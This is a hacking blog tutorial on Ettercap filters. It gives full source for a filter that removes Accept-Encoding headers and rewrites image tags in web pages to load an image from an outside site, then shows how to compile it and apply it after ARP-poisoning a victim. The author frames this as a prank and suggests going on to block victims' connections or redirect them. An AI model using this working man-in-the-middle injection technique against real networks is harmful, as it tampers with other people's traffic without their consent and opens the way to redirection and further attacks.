Fun With Ettercap Filters !!!!!!!

In one my previous post i explained how to use Ettercap .In this Tutorial i will explain  How to use Ettercap filters  .If you have not read the previous article ,please go through it before reading this one From here

Fun With Ettercap Filters !!!!!!!
Things we need


1. Ettercap In a Linux box  - to compile  filters  " I will be using Backtrack for this tutorial "

Procedure

1. First  copy paste the following source code in a text file and save it as ig.filter

# ################################################
# Jolly Pwned -- ig.filter -- filter source file ##
#By Irongeek. based on code from ALoR & NaGA ######
# Along with some help from Kev and jon.dmml #####
# credits --- irongeek ............. #############
# ################################################

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
 # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

 2. The above source code was written by irongeek .Lets have look into the source code ...
  • The code should be pretty self explanatory to anyone who has done much coding before (it's very much like C and other languages). 
  • The # symbols are comments. 
  • The "if" statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. 
  • This test may still miss some images, but should get most of them. I'm also not sure about Ettercap's order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors).  
  • The "replace" function replaces the first parameter string with the second. 
  •  Because of the way this string replacement works it will try to mangled image tags and insert the picture we desire into the web page's HTML before it returns it to the victim. 

The tags may end up looking something like the following:

                <img src="http://www.irongeek.com/images/jollypwn.png" /images/original-image.jpg>

        The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The "msg" function just prints to the screen letting us know that the filter has fired off.Now that we sort of understand the basics of the filter lets compile it


3. To compile the filter open a new Terminal and enter
etterfilter ig.filter -o ig.ef

where
Ig.flter is the file which we created in previous step
ig.ef  is the compiled output file (filter )


4. Now open Etterecap ARP poison the victim and start sniffing ..( I have already explained this in my previous article)

5 . Now open Filters by going to Filter ---> apply filter  ,as shown



6. Now select the filter which we created "ig.ef" and click ok



7. Now when the victim opens any web page He will see the pictures as shown below



Cool huh!!!!!!? Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss

Can I write My Own Filters ?
Yes you can write your own filter ....you can do some funny stuff like blocking the Internet connection , or redirecting the Victim to another website ..and many more , its left to your Imagination.. For more information on things you can do with Ettercap filters ,look at the sample code in the file "etter.filter.examples" that comes along with Ettercap. On my box this file is located in /usr/share/ettercap/etter.filter.examples

Hope You enjoyed this post !!!!!.If you have any doubts please feel free to post a comment !!!

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Anonymous

is this only for LAN connection?

REPLY
Anonymous

LAN, WLAN, and sometimes VPN/WAN

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger